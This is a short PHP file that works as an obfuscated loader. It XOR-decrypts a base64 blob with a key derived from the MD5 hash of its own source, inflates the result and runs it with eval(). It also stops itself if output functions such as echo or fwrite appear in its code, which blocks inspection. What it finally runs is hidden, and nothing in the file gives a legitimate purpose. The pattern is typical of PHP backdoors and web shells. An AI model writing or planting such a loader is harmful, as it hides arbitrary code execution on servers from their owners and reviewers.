<?php
$hwxcboxpc="8fea133b1d07de8d6f523ff8de506418";
$vxcjtln="08055d52000a010301020904065d0c53015e0353555e045c535250535301040a";
$nnoixslrgojx="bTN5ffIJIp36eJsJ9/K1RKNudso4G+OgFrr10tLwWFBrPSMbmRbTXMxtHn23stf5+/bazYAl8IE11qu5qLbk7KnVfXSqftNxBXMZaSw89n+CC6IxpnftPiXrFqF0zzMpbjgdUyqNwqtYFmixTKdyHdy0cuN0UgKr8HTVb68MheOkrrhm3zJNHmrTdr/vG8Fkk65wk1tsI3vLJk/k+D9oYPn9saGXcTtQEB1gnPxS4nibufODdGrivnWpnFQgAsZy2An+VpZNpvQVuvtXEA4d+PnF38a++2XDVusZNJ2kam8ueDXWt7JgrmnkFztW6xYtykfmb5uqGVpLX2nK/mtNyDM=";
$qfsjqml=file_get_contents(__FILE__);
$znoiocsjbpoc=str_replace($nnoixslrgojx,"",$qfsjqml);
if(strpos($znoiocsjbpoc,"ec"."ho")!==false||strpos($znoiocsjbpoc,"pr"."int")!==false||strpos($znoiocsjbpoc,"var_"."dump")!==false||strpos($znoiocsjbpoc,"file_put_"."contents")!==false||strpos($znoiocsjbpoc,"fw"."rite")!==false){die();}
$iwantjw=str_replace(array($hwxcboxpc,$vxcjtln),array("SP_7eabc0a1","KP_29418db6"),$qfsjqml);
$foyjezsof=md5($iwantjw);
$opmloi=hex2bin($vxcjtln);
$wwaiygbrx="";
$frahhdzjqpkh=strlen($foyjezsof);
for($cupeyfe=0;$cupeyfe<$frahhdzjqpkh;$cupeyfe++){
    $wwaiygbrx.=chr(ord($opmloi[$cupeyfe])^ord($foyjezsof[$cupeyfe]));
}
$gnfgtotcy=base64_decode($nnoixslrgojx);
$bevojefihpl=strlen($gnfgtotcy);
$zloivwjy="";
$hsytztpfxx=strlen($wwaiygbrx);
for($cupeyfe=0;$cupeyfe<$bevojefihpl;$cupeyfe++){
    $zloivwjy.=$gnfgtotcy[$cupeyfe]^$wwaiygbrx[$cupeyfe%$hsytztpfxx];
}
$vngcpjyq="gz"."in"."fl"."ate";
eval($vngcpjyq($zloivwjy));
